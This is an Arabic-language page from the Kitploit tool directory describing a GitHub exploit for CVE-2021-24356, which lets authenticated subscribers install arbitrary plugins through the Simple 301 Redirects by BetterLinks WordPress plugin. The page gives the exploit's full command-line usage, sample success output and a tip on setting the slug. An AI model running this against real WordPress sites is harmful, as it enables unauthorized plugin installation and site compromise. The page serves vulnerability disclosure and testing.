Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-24356 — إعادة التوجيه 301 البسيطة من BetterLinks - 2.0.0 – 2.0.3 - مشترك + تثبيت إضافة تعسفي | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2021-24356
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2021-24356

CVE-2021-24356

إعادة التوجيه 301 البسيطة من BetterLinks - 2.0.0 – 2.0.3 - مشترك + تثبيت إضافة تعسفي

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-24356

Simple 301 Redirects من BetterLinks - 2.0.0 – 2.0.3 - مشترك + تثبيت إضافي عشوائي

وصف

نقص في فحوصات الصلاحية وفحص غير كافٍ لـ nonce في إجراء AJAX داخل الإضافة جعل من الممكن للمستخدمين المصادق عليهم تثبيت إضافات عشوائية على المواقع الضعيفة.

كيفية الاستخدام

root@kitploit:~
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}

ملاحظة: قد لا يتم تنشيط بعض الإضافات إذا لم تقم بتغيير متغير sluga إلى المسار/file.php الذي هو الملف الرئيسي للإضافة؛ يعمل بشكل جيد جداً عندما يكون slug شيئاً مثل betterlinks ويكون الملف الرئيسي للإضافة اسمه betterlinks.php.

تنزيل الأداة